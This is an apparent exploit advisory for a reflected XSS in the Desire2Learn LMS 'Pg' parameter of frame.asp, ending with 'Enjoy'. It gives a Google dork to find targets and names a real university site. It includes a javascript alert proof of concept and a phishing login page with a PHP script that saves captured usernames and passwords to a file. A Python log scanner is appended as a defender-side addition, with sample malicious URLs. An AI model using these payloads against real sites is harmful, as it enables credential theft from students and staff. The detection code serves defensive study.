# Exploit Title: Desire2Learn LMS XSS
# Google Dork: allintext:Powered by Desire2Learn
# Date: 4/22/16
# Exploit Author: @CrazedSec
# Vendor Homepage: http://www.d2l.com/
# Tested on: Firefox on Mac 10.8.5

Description: Desire2Learn has a reflected XSS vulnerability in the Pg parameter of frame.asp.

PoC #1:
1. Google allintext:Powered by Desire2Learn and find a site with the LMS. (example: learn.colorado.edu)
2. Add /frame.asp?Pg=javascript:alert('xss by @grumpysec')

PoC #2:

Host 2 files on a site

#========= phish.html =========#
<html>
<div style="text-align: center;">
    <form Method="post" action="http://www.yoursite/phish.php">
        <br>
        <font color="red">Please login to continue!</font><br><br>Username :<br /> <input name="User" /><br />Password :<br />
        <input name="Password" type="password" /><br /><br /><input name="Valid" value="Login" type="submit" />
        <br /></form>
</div>
</body>
</html>

#========= phish.php =========#

<?php
$login = $_POST['user'];
$password = $_POST['Password'];
$open = fopen('pwned.txt', 'a+');
fputs($open, 'Username : ' . $login . '<br >' . '
Password : ' . $password . '<br >' . '<br >');
?>

learn.colorado.edu/frame.asp?Pg=http://yourphishingsite.com/phish.html
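
A defender-side check for the pattern both PoCs rely on, as an added example that is not part of the original advisory: it scans web-server access logs for frame.asp requests whose Pg value carries a non-HTTP scheme or points off-site. The combined log format, the TRUSTED_HOSTS value and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit
# Assumption: hostnames that belong to your own LMS deployment.
TRUSTED_HOSTS = {"lms.example.org"}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):", re.I)
LEADING_JUNK = "".join(map(chr, range(33)))  # C0 controls and space

def classify_pg(value):
    """Return a reason string if a Pg value leaves the site, else None."""
    for _ in range(3):  # peel nested percent-encoding (conservative)
        value = unquote(value)
    # Browsers drop tab/CR/LF inside a URL, skip leading controls and treat
    # backslashes as slashes, so normalise the same way before judging it.
    value = re.sub(r"[\t\r\n]", "", value).lstrip(LEADING_JUNK).replace("\\", "/")
    match = SCHEME.match(value)
    if match and match.group(1).lower() not in ("http", "https"):
        return "non-web scheme: " + match.group(1).lower()
    if match or value.startswith("//"):
        host = urlsplit(value if match else "http:" + value).hostname
        if host not in TRUSTED_HOSTS:
            return "off-site host: " + str(host)
    return None

def scan(log_lines):
    """Return (line_number, reason) pairs for suspicious frame.asp requests."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        found = REQUEST.search(line)
        target = urlsplit(found.group(1)) if found else None
        if not target or not target.path.lower().endswith("/frame.asp"):
            continue
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            reason = classify_pg(value) if key.lower() == "pg" else None  # ASP keys: any case
            if reason:
                hits.append((number, reason))
    return hits

# Constructed sample lines in combined log format, not real traffic.
SAMPLE = [
    '192.0.2.1 - - [22/Apr/2016:10:00:01 +0000] "GET /frame.asp?Pg=/d2l/home HTTP/1.1" 200 900',
    '192.0.2.2 - - [22/Apr/2016:10:00:02 +0000] "GET /frame.asp?Pg=javascript:alert(1) HTTP/1.1" 200 512',
    '192.0.2.3 - - [22/Apr/2016:10:00:03 +0000] "GET /frame.asp?Pg=http://phish.example/phish.html HTTP/1.1" 200 512',
    '192.0.2.4 - - [22/Apr/2016:10:00:04 +0000] "GET /Frame.asp?pg=Java%09Script:alert(1) HTTP/1.1" 200 512',
    '192.0.2.5 - - [22/Apr/2016:10:00:05 +0000] "GET /frame.asp?Pg=%252F%252Fphish.example%252Fx HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

The same classify_pg logic, inverted into an allowlist, is what a server-side fix for Pg would enforce: accept only relative paths or trusted hosts and reject everything else.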

Enjoy

# siph0n [2016-05-12]